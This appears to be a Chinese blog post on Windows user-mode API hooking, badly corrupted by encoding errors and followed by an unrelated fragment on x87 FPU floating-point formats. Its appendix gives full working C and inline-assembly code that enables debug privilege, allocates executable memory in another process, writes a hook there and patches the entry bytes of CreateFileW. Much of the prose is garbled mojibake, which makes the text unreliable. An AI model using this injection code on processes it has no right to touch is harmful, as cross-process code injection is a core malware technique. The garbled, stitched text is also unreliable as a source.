拦截api的技术有很多�U�，大体分�ؓ用户层和内核层的拦截�Q�这里只说说用户层的拦截�Q�而用户层也分��多种�Q�修改PE文�g导入表，直接修改要拦截的api的内存（从开始到最后，使程序蟩转到指定的地址执行�Q�．不过大部分原理都是修改程序流�E�，使之跌��{��C��要执行的地方�Q�然后再�q�回到原地址�Q�原来api的功能必��还能实玎ͼ�否则拦截��失��M��用了�Q�修�Ҏ��件导入表的方法的�~�点是如果用��L��序动态加载（使用LoadLibrary和GetProcAddress函数�Q�，拦截��变得复杂一些．所以这里介�l�一下第二种�Ҏ��Q�直接修改api�Q�当然不是全局的．�Q�后面会说到�Q?br />
　　需要了解的一些知识：

　　�Q�．windows内存的结构属性和�q�程地址�I�间

　　�Q�．函数堆栈的一些知�?br />

一�Q�win2000和xp的内存结构和�q�程地址�I�间

windows采用4GB�q�_��虚拟地址�I�间的做法。即每个�q�程单独拥有4GB的地址�I�间。每个进�E�只能访问自��q��q?GB的虚拟空��_��而对于其他进�E�的地址�I�间则是不可见的。这样保证了�q�程的安全性和�E�_��性。但是，�q?GB的空间是一个虚拟空��_��在��用之前，我们必须先保留一�D�虚拟地址�Q�然后再��D�虚拟地址提交物理存储器。可是我们的内存大部分都�q�没�?GB�Q�那么这4GB的地址�I�间是如何实现的呢？事实上windows采用的内存映��这�U�方法，��x��物理��盘当作内存来��用，比如我们打开一个可执行文�g的时候，操作�pȝ��会�ؓ我们开辟这�?GB的地址�I�间�Q?x00000000--0xffffffff。其�?x00000000--0x7fffffff是属于用户层的空�?0x80000000--0xffffffff则属于共享内核方式分区，主要是操作系�l�的�U�程调度�Q�内存管理，文�g�pȝ��支持�Q�网�l�支持和所有设备驱动程序。对于用户层的进�E�，�q�些地址�I�间是不可访问的。�Q何访问都��导致一个错误。开辟这4GB的虚拟地址�I�间之后�Q�系�l�会把磁盘上的执行文件映��到�q�程的地址�I�间中去(一般是在地址0x00400000�Q�可以通过修改�~�译选项来修改这个地址)而一个进�E�运行所需要的动态库文�g则一般从0x10000000开始加载。但是如果所有的动态库都加载到�q�个位置肯定会引起冲�H�。因此必��d��一些可能引起冲�H�的dll�~�译旉��C��改基地址。但是对于所有的操作�pȝ��所提供的动态库windows已经定义好了映射在指定的位置。这个位�|�会随着版本的不同而会有所改变�Q�不�q�对于同一台机器上的映��地址来说都是一��L��。即在a�q�程里映��的kernel32.dll的地址和在�q�程b里的kernel32.dll的地址是一��L��。对于文件映��是一�U�特�D�的方式�Q��得程序不需要进行磁盘i/o��p��对磁盘文件进行操作，而且支持多种保护属性。对于一个被映射的文�Ӟ��主要是��用CreateFileMapping函数�Q�利用他我们可以讑֮�一些读写属�?PAGE_READONLY,PAGE_READWRITE,PAGE_WRITECOPY.�W�一参数指定只能对该映射文�g�q�行��L��作。�Q何写操作��导致内存访问错误。第二个参数则指明可以对映射文�g�q�行��d��。这时候，��M��Ҏ��件的��d��都是直接操作文�g的。而对于第三个参数PAGE_WRITECOPY��֐�思义��是写入时拷贝，��M��向这�D�内存写入的操作(因�ؓ文�g是映��到�q�程地址�I�间的，对这�D늩�间的��d��q��当于�Ҏ��件进行的直接��d��)都将被系�l�捕��P��q��新在你的虚拟地址�I�间重新保留�q�分配一�D�内存，你所写入的一切东襉K��在�q�里�Q�而且你原先的指向映射文�g的内存地址也会实际指向�q�段重新分配的内存，于是在进�E�结束后�Q�映��文件内容�ƈ没有改变�Q�只是在�q�行期间在那�D늧�有拷贝的内存里面存在着你修改的内容。windows�q�程�q�行所需要映��的一些系�l�dll��是以这�U�方式映��的�Q�比如常用的ntdll.dll,kernel32.dll,gdi32.dll.几乎所有的�q�程都会加蝲�q�三个动态库。如果你在一个进�E�里修改�q�个映射文�g的内容，�q�不会媄响到其他的进�E��用他们。你所修改的只是在本进�E�的地址�I�间之内的。事实上原始文�g�q�没有被改变�?br />�q�样�Q�在后面的修改系�l�api的时候，实际��是修改�q�些动态库地址内的内容。前面说到这不是修改全局api��是�q�个原因�Q�因��Z��们都是以写入时拷贝的方式来映��的。不�q�这已经��_��了，windows提供�?个强大的内存操作函数ReadProcessMemory和WriteProcessMemory.利用�q�两个函数我们就可以随便对�Q意进�E�的��L��用户地址�I�间�q�行��d��了。但是，现在有一个问题，我们该写什么，说了半天�Q�怎么实现跌��{呢？现在来看一个简单的例子�Q?br />MessageBox(NULL, "World", "Hello", 0);
我们在执行这条语句的时候，调用了系�l�api MessageBox�Q�实际上在程序中我没有定义UNICODE宏，�pȝ��调用的是MessageBox的ANSI版本MessageBoxA,�q�个函数是由user32.dll导出的。下面是执行�q�条语句的汇�~�代码：
0040102A push 0
0040102C push offset string "Hello" (0041f024)
00401031 push offset string "World" (0041f01c)
00401036 push 0
00401038 call dword ptr [__imp__MessageBoxA@16 (0042428c)]
前面四条指��o分别为参数压栈，因�ؓMessageBoxA是__stdcall调用�U�定�Q�所以参数是从右往左压栈的。最后再CALL 0x0042428c

看看0042428c�q�段内存的��|��
0042428C 0B 05 D5 77 00 00 00
可以看到�q�个�?x77d5050b,正是user32.dll导出函数MessageBoxA的入口地址�?br />
�q�是0x77D5050B处的内容�Q?
77D5050B 8B FF mov edi,edi
77D5050D 55 push ebp
77D5050E 8B EC mov ebp,esp
理论上只要改变api入口和出口的��M��机器码，都可以拦截该api。这里我选择最��单的修改�Ҏ��Q�直接修改api入口的前十个字节来实现蟩转。�ؓ什么是十字节呢�Q�其实修改多��字节都没有关系�Q�只要实��C��函数的蟩转之后，你能把他们恢复�ƈ让他�l�箋�q�行才是最重要的。在CPU的指令里�Q�有几条指��o可以改变�E�序的流�E�：JMP�Q�CALL�Q�INT�Q�RET�Q�RETF�Q�IRET�{�指令。这里我选择CALL指��o�Q�因��Z��是以函数调用的方式来实现跌��{的，�q�样可以带一些你需要的参数。到�q�里�Q�我该说说函数的堆栈了�?br />
�ȝ��Q�windows�q�程所需要的动态库文�g都是以写入时拯��的方式映��到�q�程地址�I�间中的。这��P��我们只能拦截指定的进�E�。修改目标进�E�地址�I�间中的指定api的入口和出口地址之间的�Q意数据，使之跌��{到我们的拦截代码中去�Q�然后再恢复�q�些字节�Q��之能��利工作�?br />

二：函数堆栈的一些知�?br />
正如前面所看到MessageBoxA函数执行之前的汇�~�代码，首先��四个参数压栈，然后CALL MessageBoxA�Q�这时候我们的�U�程堆栈看�v来应该是�q�样的：

| | <---ESP
|�q�回地址|
|参数1|
|参数2|
|参数3|
|参数4|
|.. |

我们再看MessageBoxA的汇�~�代码，
77D5050B 8B FF mov edi,edi
77D5050D 55 push ebp
77D5050E 8B EC mov ebp,esp
注意到堆栈的操作有PUSH ebp,�q�是保存当前的基址指针�Q�以便一会儿恢复堆栈后返回调用线�E�时使用�Q�然后再有mov ebp,esp��是把当前esp的��D��l�ebp�Q�这时候我们就可以使用 ebp+偏移来表�C�堆栈中的数据，比如参数1��可以表�C�成[ebp+8]�Q�返回地址��可以表�C�成[ebp+4]..如果我们在拦截的时候要对这些参数和�q�回地址做�Q何处理，��可以��用这�U�方法。如果这个时候函数有局部变量的话，��通过减小ESP的值的方式来�ؓ之分配空间。接下来��是保存一些寄存器�Q�EDI,ESI,EBX.要注意的是，函数堆栈是反方向生长的。这时候堆栈的样子�Q?br />|....|
|EDI| <---ESP
|ESI|
|EBX|
|局部变量|
|EBP |
|�q�回地址|
|参数1|
|参数2|
|参数3|
|参数4|
|.. |

在函数返回的时候，由函数自�w�来�q�行堆栈的清理，�q�时候清理的��序和开始入栈的��序恰恰相反�Q�类似的汇编代码可能是这��L��Q?br />
pop edi
pop esi
pop ebx
add esp, 4
pop ebp
ret 0010
先恢复那些寄存器的��|��然后通过增加ESP的值的方式来释攑ֱ�部变量。这里可以用mov esp, ebp来实现清�I�所有局部变量和其他一些空闲分配空间。接着函数会恢复EBP的��|��利用指��oPOP EBP来恢复该寄存器的倹{��接着函数�q�行ret 0010�q�个指��o。该指��o的意思是�Q�函数把控制权交�l�当前栈��的地址的指令，同时清理堆栈�?6字节的参数。如果函数有�q�回值的话，那在EAX寄存器中保存着当前函数的返回倹{��如果是__cdecl调用方式�Q�则执行ret指��o�Q�对于堆栈参数的处理交给调用�U�程��d��。如wsprintf函数�?br />
�q�个时候堆栈又恢复了原来的样子。线�E�得以��l�往下执�?..
在拦截api的过�E�之中一个重要的��d��是保证堆栈的正��性。你要理清每一步堆栈中发生了什么�?br />

三：形成思�\

呵呵�Q�不知道你现在脑��h��不是有什么想法。怎么��d��现拦截一个api�Q?br /> �q�里�l�出一个思�\�Q�事实上拦截的方法真的很多，理清了一个，其他的也��容易了。而且上面所说的2个关键知识，也可以以另外的�Ş式来利用�?br /> 我以拦截CreateFile�q�个api��Z��子来��单说下这个思�\吧：

首先�Q�既然我们要拦截�q�个api��应该知道这个函数在内存中的位置吧，臛_��需要知道从哪儿入口。CreateFile�q�个函数是由kernel32.dll�q�个动态库导出的。我们可以��用下面的�Ҏ��来获取他映射到内存中的地址�Q?br /> HMODULE hkernel32 = LoadLibrary("Kernel32.dll");
PVOID dwCreateFile = GetProcAddress(hkernei32, "CreateFileA");
�q�就可以得到createfile的地址了，注意�q�里是获取的createfile的ansic版本。对于UNICODE版本的则获取CreateFileW。这时dwCreateFile的值就是他的地址了。对于其他进�E�中的createfile函数也是�q�个地址�Q�前面说�q�windows指定了他提供的所有的dll文�g的加载地址�?br />
接下来，我们该想办法实现跌��{了。最��单的�Ҏ��是修改�q�个api入口处的代码了。但是我们该修改多少呢？修改的内容�ؓ什么呢�Q�前面说�q�我们可以��用CALL的方式来实现跌��{�Q�这�U�方法的好处是可以�ؓ你的拦截函数提供一个或者多个参数。这里只要一个参数就��_��了。带参数的函数调用的汇编代码是什么样子呢�Q�前面也已经说了�Q�类��g��调用MessageBoxA时的代码�Q?br />
PUSH 参数地址
CALL 函数入口地址(�q�里��Z��个偏�U�d��址)

执行�q?条指令就能蟩转到你要拦截的函��C��Q�但是我们该修改成什么呢。首先，我们需要知道这2条指令的长度和具体的机器代码的倹{��其中PUSH对应0x68�Q�而CALL指��o对应的机器码�?xE8,而后面的则分别对应拦截函数的参数地址和函数的地址。注意第一个是一个直接的地址�Q�而第二个则是一个相对地址。当然你也可以��?xFF0x15�q�个CALL指��o来进行直接地址的蟩转�?br />下面��是计算�q?个地址的��g��Q?br />对于参数和函��C��的地址�Q�要分情况而定�Q�对于对本进�E�中api的拦截，则直接取地址��可以了。对于参敎ͼ�可以先定义一个参数变量，然后取变量地址��ok了�?br />如果是想拦截其他�q�程中的api�Q�则必须使用其他一些方法，最典型的方法是利用VirtualAllocEx函数来在其他�q�程中申请和提交内存�I�间。然后用WriteProcessMemory来分别把函数体和参数分别写入甌��和分配的内存�I�间中去。然后再生成要修改的数据�Q�最后用WriteProcessMemory来修改api入口�Q�把入口的前10字节修改为刚刚生成的跌��{数据。比如在�q�程�q�程中你写入的参数和函数体的内存地址分别�?x00010000�?x00011000,则生成的跌��{数据�?68 00 00 01 00 E8 00 10 01 00(PUSH 00010000 CALL 00011000),�q�样�E�序�q�行createfile函数的时候将会先�q�行PUSH 00010000 CALL 00011000�Q�这样就辑ֈ�了蟩转的目的。此��L��们应该时��L��意堆栈的状态，对于CreateFile�?br />HANDLE CreateFile(
LPCTSTR lpFileName,
DWORD dwDesiredAccess,
DWORD dwShareMode,
LPSECURITY_ATTRIBUTES lpSecurityAttributes,
DWORD dwCreationDisposition,
DWORD dwFlagsAndAttributes,
HANDLE hTemplateFile
);
可以看到其有7个参敎ͼ�于是在调用之前，堆栈应该已经被压入了�q?个参敎ͼ�堆栈的样子：
|....| <---ESP
|createfile执行后的下一条指令地址|
|参数1|
|参数2|
|参数3|
|参数4|
|参数5|
|参数6|
|参数7|
|..|

�q�是执行到我们的跌��{语句�Q�PUSH 00010000,于是堆栈又变了：

|....| <---ESP
|00010000|
|createfile执行后的下一条指令地址|
|参数1|
|参数2|
|参数3|
|参数4|
|参数5|
|参数6|
|参数7|
|..|

接着执行CALL 00011000,堆栈变�ؓ�Q?br />|...| <---ESP
|api入口之后的第11个字节的指��o的地址|
|00010000|
|createfile执行后的下一条指令地址|
|参数1|
|参数2|
|参数3|
|参数4|
|参数5|
|参数6|
|参数7|
|..|

接下来就��C��我们的拦截函��C��拉，当然�Q�函数肯定也会做一些类似动作，把EBP压栈�Q��ؓ局部变量分配空间等。这时候堆栈的样子又变了：

|EDI| <---ESP
|ESI|
|EBX|
|局部变量|
|EBP| <---EBP
|api入口之后的第11个字节的指��o的地址|
|00010000|
|createfile执行后的下一条指令地址|
|参数1|
|参数2|
|参数3|
|参数4|
|参数5|
|参数6|
|参数7|
|..|

�q�时候，你想做什么就��情地做吧，获取参数信息�Q��g�~�执行CreateFile函数�{�等。拿获取打开文�g句柄的名字来说吧�Q�文件名是第一个参敎ͼ�前面说过我们可以用[EBP+8]来获取参敎ͼ�但是对照上面的堆栈�Ş�Ӟ��中间又加了另外一些数据，所以我们用[EBP+16]来获取第一个参数的地址。比如：
char* PFileName = NULL;
__asm{
MOV EAX,[EBP+16]
MOV [szFileName], EAX
}

比如我们用一个messagebox来弹��Z��个信息，说明该程序即��打开一个某谋�\径的文�g句柄。但是有一个要注意的是�Q�如果你��x��截远�E�进�E�的话，对于那个拦截函数中所使用到的��M��函数或者以��M��形式的相对地址的调用都要停止。因为每个进�E�中的地址分配都是独立的，比如上面的CALL MessageBoxA�Ҏ��直接地址的调用。对于��用messagebox�Q�我们应该定义一个函数指针，然后把这个指针的��D��gؓuser32.dll中导��函数的直接地址。然后利用这个指针来�q�行函数调用。对于messagebox函数的调用可以这��P��在源�E�序中定义一个参数结构体�Q�参��C��包含一个导出函数的地址,把这个地址设�ؓMessageBoxA的直接地址�Q�获取地址的方法就不说了。然后把�q�个参数传给拦截函数�Q�就可以使用拉。这也是利用一个参数的原因。类��g��码如下：

typedef struct _RemoteParam {
DWORD dwMessageBox;
} RemoteParam, * PRemoteParam;

typedef int (__stdcall * PFN_MESSAGEBOX)(HWND, LPCTSTR, LPCTSTR, DWORD);//定义一个函数指�?br />
//拦截函数
void HookCreateFile(LPVOID lParam)
{
RemoteParam* pRP = (RemoteParam*)lParam;//获取参数地址
char* PFileName = NULL;//定义一个指�?br />__asm{
MOV EAX,[EBP+16]
MOV [szFileName], EAX //把CreateFile�W�一个参数的��|��文�g的�\径的地址�? //�l�szFileName
}

//�?义一个函数指�?br />PFN_MESSAGEBOX pfnMessageBox = (PFN_MESSAGEBOX)pRP->dwMessageBox;

pfnMessageBox(NULL, PFileName, PFileName, MB_ICONINFORMATION |MB_OK);
//输出要打开的文件的路径
//.....
}

对于你要使用的其他函敎ͼ�都是使用同样的方式，利用�q�个参数来传递我们要传递的函数的绝对地址�Q�然后定义这个函数指针，��可以��用了�?br />

好了�Q�接下来我们该让被拦截的api正常工作了，�q�个不难�Q�把他原来的数据恢复一下就可以了。那入口�?0个字节。我们在改写他们的时候应该保存一下，然后也把他放在参��C��传递给拦截函数�Q�呵呵，参数的作用可多了。接着我们��可以用WriteProcessMemory函数来恢复这个api的入口了�Q�代码如下：
PFN_GETCURRENTPROCESS pfnGetCurrentProcess = (PFN_GETCURRENTPROCESS)pRP->dwGetCurrentProcess;
PFN_WRITEPROCESSMEMORY pfnWriteProcessMemory = (PFN_WRITEPROCESSMEMORY)pRP->dwWriteProcessMemory;

if(!pfnWriteProcessMemory(pfnGetCurrentProcess(),
(LPVOID)pfnConnect,
(LPCVOID)pRP->szOldCode,
10,
NULL))
pfnMessageBox(NULL, pRP->szModuleName1, pRP->szModuleName2, MB_ICONINFORMATION | MB_OK);
其中�q�些函数指针的定义和上面的类伹{�?br />而参��C��的szoldcode则是在源�E�序中在修改api之前保存好，然后传给拦截函数�Q�在源程序中是用ReadProcessMemory函数来获取他的前10个字节的�Q?br />ReadProcessMemory(GetCurrentProcess(),
(LPCVOID)RParam.dwCreateFile,
oldcode,
10,
&dwPid)
strcat((char*)RParam.szOldCode, (char*)oldcode);

接下来如果你�q��l�保持对该api的拦截，则又该用WriteProcessMemory 来修改入口了�Q�跟前面的恢复入口是一��L��Q�只不过把szOldCode换成了szNewCode了而已。这样你又能对CreateFile�l�箋拦截了�?br />
好了�Q�接下来该进行堆栈的清理了，也许你还要做点其他事情，��管做去。但是清理堆栈是必须要做的，在函数结束的时候，因�ؓ在我们放任api恢复执行之后�Q�他又return 到我们的函数中来了，�q�个时候的堆栈是什么样子呢�Q?br />|EDI| <---ESP
|ESI|
|EBX|
|局部变量|
|EBP| <---EBP
|api入口之后的第11个字节的指��o的地址|
|00010000|
|createfile执行后的下一条指令地址|
|参数1|
|参数2|
|参数3|
|参数4|
|参数5|
|参数6|
|参数7|
|..|

我们的目标是把返回��D��录下来放到EAX寄存器中去，把返回地址记录下来�Q�同时把堆栈恢复成原来的样子�?br />首先我们恢复那些寄存器的��|��接着释放局部变量，可以用mov esp, ebp.因�ؓ我们不清楚具体的局部变量分配了多少�I�间。所以��用这个方法�?br />

__asm
{POP EDI
POP ESI
POP EBX //恢复那些寄存�?br />MOV EDX, [NextIpAddr]//把返回地址攑ֈ�EDX中，因�ؓ待会�? //EBX被恢复后�Q�线�E�中的所有局部变量就不能正常使用了�?br />
MOV EAX, [RetValue]//�q�回值放到EAX中，当然也可以修改这个返回�?br />MOV ESP, EBP//清理局部变�?br />POP EBP//恢复EBP的�?br />ADD ESP, 28H //清理参数和返回地址�Q�注意一�?7+1+1+1)*4
PUSH EDX //把返回地址压栈�Q�这��h��中就只有�q�一个返回地址了，�q�回之后�? //��q��?br />RET
}

�q�样�Q�一切就完成了，堆栈恢复了应该有的状态，而你��x��截的也拦截到了�?br />

四：后记
拦截的方式多�U�多��P��不过大体的思�\却都相同。要时刻注意你要拦截的函数的堆栈状态以及在拦截函数中的�Ҏ��据的引用和函数的调用�Q�地址问题�Q��?br />

//////////////////////////////////////////////////////////////////////
附录�Q�一个拦截CreateFile函数的简单实�?br />//////////////////////////////////////////////////////////////////////

CODE:

#include
#include
#include

#pragma comment(lib, "psapi.lib")

typedef struct _RemoteParam {
DWORD dwCreateFile;
DWORD dwMessageBox;
DWORD dwGetCurrentProcess;
DWORD dwWriteProcessMemory;
unsigned char szOldCode[10];
DWORD FunAddr;
} RemoteParam, * PRemoteParam;

typedef HANDLE (__stdcall * PFN_CREATEFILE)(LPCTSTR,DWORD,DWORD,LPSECURITY_ATTRIBUTES,DWORD,DWORD,HANDLE);
typedef int (__stdcall * PFN_MESSAGEBOX)(HWND, LPCTSTR, LPCTSTR, DWORD);
typedef BOOL (__stdcall * PFN_WRITEPROCESSMEMORY)(HANDLE,LPVOID,LPCVOID,SIZE_T,SIZE_T*);
typedef HANDLE (__stdcall * PFN_GETCURRENTPROCESS)(void);

#define PROCESSNUM 128
#define MYMESSAGEBOX "MessageBoxW"
#define MYCREATEFILE "CreateFileW"

void HookCreateFile(LPVOID lParam)
{

RemoteParam* pRP = (RemoteParam*)lParam;

DWORD NextIpAddr = 0;
DWORD dwParamaAddr = 0;

HANDLE RetFpHdl = INVALID_HANDLE_VALUE;
LPCTSTR lpFileName;
DWORD dwDesiredAccess;
DWORD dwShareMode;
LPSECURITY_ATTRIBUTES lpSecurityAttributes;
DWORD dwCreationDisposition;
DWORD dwFlagsAndAttributes;
HANDLE hTemplateFile;
PFN_CREATEFILE pfnCreatefile = (PFN_CREATEFILE)pRP->dwCreateFile;

__asm
{
MOV EAX,[EBP+8]
MOV [dwParamaAddr], EAX
MOV EAX,[EBP+12]
MOV [NextIpAddr], EAX
MOV EAX,[EBP+16]
MOV [lpFileName], EAX
MOV EAX,[EBP+20]
MOV [dwDesiredAccess],EAX
MOV EAX,[EBP+24]
MOV [dwShareMode],EAX
MOV EAX,[EBP+28]
MOV [lpSecurityAttributes],EAX
MOV EAX,[EBP+32]
MOV [dwCreationDisposition],EAX
MOV EAX,[EBP+36]
MOV [dwFlagsAndAttributes],EAX
MOV EAX,[EBP+40]
MOV [hTemplateFile],EAX
}

PFN_MESSAGEBOX pfnMessageBox = (PFN_MESSAGEBOX)pRP->dwMessageBox;
int allowFlag = pfnMessageBox(NULL, lpFileName, NULL, MB_ICONINFORMATION | MB_YESNO);

if(allowFlag == IDYES)
{
unsigned char szNewCode[10];
int PramaAddr = (int)dwParamaAddr;
szNewCode[4] = PramaAddr>>24;
szNewCode[3] = (PramaAddr<<8)>>24;
szNewCode[2] = (PramaAddr<<16)>>24;
szNewCode[1] = (PramaAddr<<24)>>24;
szNewCode[0] = 0x68;

int funaddr = (int)pRP->FunAddr - (int)pfnCreatefile - 10 ;
szNewCode[9] = funaddr>>24;
szNewCode[8] = (funaddr<<8)>>24;
szNewCode[7] = (funaddr<<16)>>24;
szNewCode[6] = (funaddr<<24)>>24;
szNewCode[5] = 0xE8;

PFN_GETCURRENTPROCESS pfnGetCurrentProcess = (PFN_GETCURRENTPROCESS)pRP->dwGetCurrentProcess;
PFN_WRITEPROCESSMEMORY pfnWriteProcessMemory = (PFN_WRITEPROCESSMEMORY)pRP->dwWriteProcessMemory;
pfnWriteProcessMemory(pfnGetCurrentProcess(),
(LPVOID)pfnCreatefile,
(LPCVOID)pRP->szOldCode,
10,
NULL);

RetFpHdl = pfnCreatefile(lpFileName,
dwDesiredAccess,
dwShareMode,
lpSecurityAttributes,
dwCreationDisposition,
dwFlagsAndAttributes,
hTemplateFile);
pfnWriteProcessMemory(pfnGetCurrentProcess(),
(LPVOID)pfnCreatefile,
(LPCVOID)szNewCode,
10,
NULL);
}

__asm
{POP EDI
POP ESI
POP EBX
MOV EDX, [NextIpAddr]
MOV EAX, [RetFpHdl]
MOV ESP, EBP
POP EBP
ADD ESP, 28H
PUSH EDX
RET
}

}

BOOL AdjustProcessPrivileges(LPCSTR szPrivilegesName)
{
HANDLE hToken;
TOKEN_PRIVILEGES tkp;

if(!OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken))
{
return FALSE;
}

if(!LookupPrivilegeValue(NULL,szPrivilegesName,
&tkp.Privileges[0].Luid))
{
CloseHandle(hToken);
return FALSE;
}

tkp.PrivilegeCount = 1;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

if(!AdjustTokenPrivileges(hToken,FALSE,&tkp,sizeof(tkp),NULL,NULL))
{
CloseHandle(hToken);
return FALSE;
}

CloseHandle(hToken);
return TRUE;
}

void printProcessNameByPid( DWORD ProcessId )
{
HANDLE pHd;
HMODULE pHmod;
char ProcessName[MAX_PATH] = "unknown";
DWORD cbNeeded;
pHd = OpenProcess( PROCESS_QUERY_INFORMATION |PROCESS_VM_READ, FALSE, ProcessId );
if(pHd == NULL)
return;

if(!EnumProcessModules( pHd, &pHmod, sizeof(pHmod), &cbNeeded))
return;
if(!GetModuleFileNameEx( pHd, pHmod, ProcessName, MAX_PATH))
return;

printf( "%d\t%s\n", ProcessId, ProcessName);
CloseHandle( pHd );
return;
}

int main(void)
{

if(!AdjustProcessPrivileges(SE_DEBUG_NAME))
{
printf("AdjustProcessPrivileges Error!\n");
return -1;
}

DWORD Pids[PROCESSNUM];
DWORD dwProcessNum = 0;
if(!EnumProcesses(Pids, sizeof(Pids), &dwProcessNum))
{
printf("EnumProcess Error!\n");
return -1;
}

for( DWORD num = 0; num < (dwProcessNum / sizeof(DWORD)); num++)
printProcessNameByPid(Pids[num]);

printf("\nAll %d processes running. \n", dwProcessNum / sizeof(DWORD));

DWORD dwPid = 0;
printf("\n误��入要拦截的进�E�id:");
scanf("%d", &dwPid);

HANDLE hTargetProcess = OpenProcess(PROCESS_VM_OPERATION|PROCESS_VM_WRITE|PROCESS_VM_READ, FALSE, dwPid);
if(hTargetProcess == NULL)
{
printf("OpenProcess Error!\n");
return -1;
}

DWORD dwFunAddr = (DWORD)VirtualAllocEx(hTargetProcess, NULL, 8192,
MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

if((LPVOID)dwFunAddr == NULL)
{
printf("甌��U�程内存��p�|!\n");
CloseHandle(hTargetProcess);
return -1;
}

DWORD dwPramaAddr = (DWORD)VirtualAllocEx(hTargetProcess, NULL, sizeof(RemoteParam),
MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

if((LPVOID)dwPramaAddr == NULL)
{
printf("甌��参数内存��p�|!\n");
CloseHandle(hTargetProcess);
return -1;
}

printf("\n�U�程内存地址:%.8x\n"
"参数内存地址:%.8x\n",
dwFunAddr, dwPramaAddr);
RemoteParam RParam;
ZeroMemory(&RParam, sizeof(RParam));
HMODULE hKernel32 = LoadLibrary("kernel32.dll");
HMODULE hUser32 = LoadLibrary("user32.dll");

RParam.dwCreateFile = (DWORD)GetProcAddress(hKernel32, MYCREATEFILE);
RParam.dwGetCurrentProcess = (DWORD)GetProcAddress(hKernel32, "GetCurrentProcess");
RParam.dwWriteProcessMemory = (DWORD)GetProcAddress(hKernel32, "WriteProcessMemory");
RParam.dwMessageBox = (DWORD)GetProcAddress(hUser32, MYMESSAGEBOX);

unsigned char oldcode[10];
unsigned char newcode[10];
int praadd = (int)dwPramaAddr;
int threadadd = (int)dwFunAddr;
newcode[4] = praadd>>24;
newcode[3] = (praadd<<8)>>24;
newcode[2] = (praadd<<16)>>24;
newcode[1] = (praadd<<24)>>24;
newcode[0] = 0x68;

int offsetaddr = threadadd - (int)RParam.dwCreateFile - 10 ;
newcode[9] = offsetaddr>>24;
newcode[8] = (offsetaddr<<8)>>24;
newcode[7] = (offsetaddr<<16)>>24;
newcode[6] = (offsetaddr<<24)>>24;
newcode[5] = 0xE8;

printf("NewCode:");
for(int j = 0; j < 10; j++)
printf("0x%.2x ",newcode[j]);
printf("\n\n");

if(!ReadProcessMemory(GetCurrentProcess(),
(LPCVOID)RParam.dwCreateFile,
oldcode,
10,
&dwPid))
{
printf("read error");
CloseHandle(hTargetProcess);
FreeLibrary(hKernel32);
return -1;
}

strcat((char*)RParam.szOldCode, (char*)oldcode);
RParam.FunAddr = dwFunAddr;

printf(
"RParam.dwCreateFile:%.8x\n"
"RParam.dwMessageBox:%.8x\n"
"RParam.dwGetCurrentProcess:%.8x\n"
"RParam.dwWriteProcessMemory:%.8x\n"
"RParam.FunAddr:%.8x\n",
RParam.dwCreateFile,
RParam.dwMessageBox,
RParam.dwGetCurrentProcess,
RParam.dwWriteProcessMemory,
RParam.FunAddr);
printf("RParam.szOldCode:");
for( int i = 0; i< 10; i++)
printf("0x%.2x ", RParam.szOldCode[i]);
printf("\n");

if(!WriteProcessMemory(hTargetProcess, (LPVOID)dwFunAddr, (LPVOID)&HookCreateFile, 8192, &dwPid))
{
printf("WriteRemoteProcessesMemory Error!\n");
CloseHandle(hTargetProcess);
FreeLibrary(hKernel32);
return -1;
}

if(!WriteProcessMemory(hTargetProcess, (LPVOID)dwPramaAddr, (LPVOID)&RParam, sizeof(RemoteParam), &dwPid))
{
printf("WriteRemoteProcessesMemory Error!\n");
CloseHandle(hTargetProcess);
FreeLibrary(hKernel32);
return -1;
}

if(!WriteProcessMemory(hTargetProcess, (LPVOID)RParam.dwCreateFile, (LPVOID)newcode, 10, &dwPid))
{
printf("WriteRemoteProcessesMemory Error!\n");
CloseHandle(hTargetProcess);
FreeLibrary(hKernel32);
return -1;
}

printf("\nThat's all, good luck :)\n");
CloseHandle(hTargetProcess);
FreeLibrary(hKernel32);
return 0;
}

saga.constantine 2007-01-22 16:49 发表评论

[攉��]关于汇编80X87FPU��点�q�算

saga.constantine — Wed, 17 Jan 2007 06:46:00 GMT

80X87FPU��点数据的格式、��Q点寄存器的特�?br />
��点数据格式:
在计��机中，实数的��Q�Ҏ��式（Floating-Point Format�Q�所�C�，分成指数、有效数字和�W�号位三个部分�?br />· �W�号�Q�Sign�Q�——表�C�数据的正负�Q�在最高有效位�Q�MSB�Q�。负数的�W�号位�ؓ1�Q�正数的�W�号�?�?br />· 指数�Q�Exponent�Q�——也被称为阶码，表示数据�?为底的幂。指数采用偏�Uȝ��Q�Biased Exponent�Q�表�C�，恒�ؓ整数�?br />· 有效数字�Q�Significand�Q�——表�C�数据的有效数字�Q�反映数据的�_�ֺ�。有效数字一般采用规格化�Q�Normalized�Q��Ş式，是一个纯��数�Q�所以也被称为尾敎ͼ�Mantissa�Q�、小数或分数�Q�Fraction�Q��?br /> 80x87支持三种��点数据�c�d��Q�单�_�ֺ�、双�_�ֺ�和扩展精度；它们的长度依�ơ�ؓ32�?4�?0位，�?�?�?0个字节；
· 单精度��Q�Ҏ��Q?2位短实数�Q�——由1位符受��?位指数�?3位有效数�l�成�?br />· 双精度��Q�Ҏ��Q?4位长实数�Q�——由1位符受��?1位指数�?2位有效数�l�成�?br />· 扩展�_�ֺ��点敎ͼ�80位��时实敎ͼ�——由1位符受��?5位指数�?4位有效数�l�成。很多计��机中�ƈ没有80位扩展精度这�U�数据类型，80x87 FPU主要在内部��用它存贮中间�l�果�Q�以保证最�l�数值的�_�ֺ��?/p>

80x87的指令系�l?br />��点处理单元FPU��h��自己的指令系�l�，共有几十�U��Q�Ҏ��令，可以分成传送、算术运��、超��函数、比较、FPU控制�{�类。��Q�Ҏ��令归属于ESC指��o�Q�其�?位的操作码都�?1011b�Q�它的指令助记符均以F开头�?br />1. ��点传送类指��o
